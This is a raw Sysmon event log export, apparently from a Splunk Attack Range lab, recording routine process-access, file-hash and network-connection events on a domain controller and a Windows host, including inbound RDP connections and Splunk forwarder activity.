09:10:31.218{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:31.218{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:31.218{5EBD8912-7F2F-614D-0C00-00000000FC01}8285604C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1500-00000000FC01}1216C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:31.087{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=365219AA66B1041DB0D347E45B887B52,SHA256=D31F38D1027E7170DF251A070C25412BBF1ADFA5DA7359C62C10405B29E3BA6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:32.735{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:32.734{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jju9qh5l.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite-shmMD5=AD1571A46940D3FB1232390F05040C71,SHA256=AA09F824EF68707117F1E844F260A4449AFE656573BF96082796C970C7677A31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:32.718{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9670CA33C03ED4C2C67D7B69A84202CB,SHA256=CAE822D5BF43C33EE0CAFDBBED51E9A09892B0DCA8A1AA4C1E024F4861F4ACB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978590Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:32.536{69CF5F33-7F28-614D-1200-00000000FD01}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C153B4FC4DDF794109D0FDF57005B4CC,SHA256=315A907424BE66ED2BE963ACCEF5B2F8A9915F3E29DEBEF89B7C009B4AE385A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978589Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:32.161{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DE60EF5EBE55A57643D48118FBA44D7,SHA256=F33DC983C27707FF977D4D6B1DC4824907D962F9A45AC57EF59744F17C3BD360,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:33.719{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE147FEF02ECCE36FB58AAE72C2E2DDB,SHA256=B72EC90B28DAC00E8DF44FD89F225DBE915274850852220C711557708C38B83A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978595Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:33.395{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7C576866CED7B2FC0BBD61326B300076,SHA256=B7ADEAF9B5C1CB119076DE403DB035388DA001A8E51555944D69D696FF6EE6DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978594Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:33.380{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB3B39326BF341771AB89B572C737692,SHA256=477D3575F5CFD726B171985AA7C3C15E3DB10101C66EDF566C5376BF24E39DC0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978593Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:30.489{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-50784-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978592Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:30.487{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.3.202.198-53855-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000978591Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:29.867{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59370-false10.0.1.12-8000- 23542300x8000000000000000978597Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:34.614{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64F863181EF722A967F9D6D31B1B5654,SHA256=98C6B4E673F232F36E2A292F1F98986A002FD934956E7B6BF466AB77F09C176E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:34.719{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E592D323F3DBA9FC18EB687F9D037147,SHA256=B1379C807FE6838D2F076E06CA9F5F256E34B66727F35C3F6463F2B32714374F,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:32.926{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53347-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000978596Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:31.595{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54723-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978598Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:35.848{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36E155B6BDA8CB55F90F4E36B4B45559,SHA256=325047FC2A552485070B44AE8BDA29C82B31BC51B9447517781B3CCC0CFA8E9C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:35.787{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:35.771{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4083392507F97D51D8918FAFCC832CC7,SHA256=289B2F8DFC57B11633ED3B1308C82EE03F5FB761EB676FA0160E3855F5F377BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978600Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:36.942{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77747F535534099EA1950D15992FC178,SHA256=28C25272B091BEA32E6F418FACACF5754842C00C7A794CCA0CC74BA09FE021E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978599Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:36.864{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=255549CE9475B412D1A5510B343E24CB,SHA256=300B299A2836C26304217E39AE3626C9A067802C7F7D2E9C8FE39F55771B7782,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:36.789{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24157315DE85EAD2DB227074AAC9ADC9,SHA256=F590908BEC333241839ADCE94C6E0896D33A0A59BAD592BCFFC0951A793CE0F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:36.605{5EBD8912-7F40-614D-2900-00000000FC01}2964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:10:37.888{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=56B66B51393037442529C9E9FAA10985,SHA256=E8FC45692982EF1DBFAC3D9AD5E5275A7C9D3830A9793F87A3F5505013D13E28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978615Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.880{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A713E978E05C1A557E82B602880EA06,SHA256=6A2863D96934849960EC4CB0FF686259204DBB23D297AC1B248BC312FDBED272,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000978614Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8A8D-6151-BF79-00000000FD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978613Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978612Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978611Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978610Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978609Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978608Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978607Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978606Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978605Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000978604Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:10:37.583{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8A8D-6151-BF79-00000000FD01}3844C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000978603Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 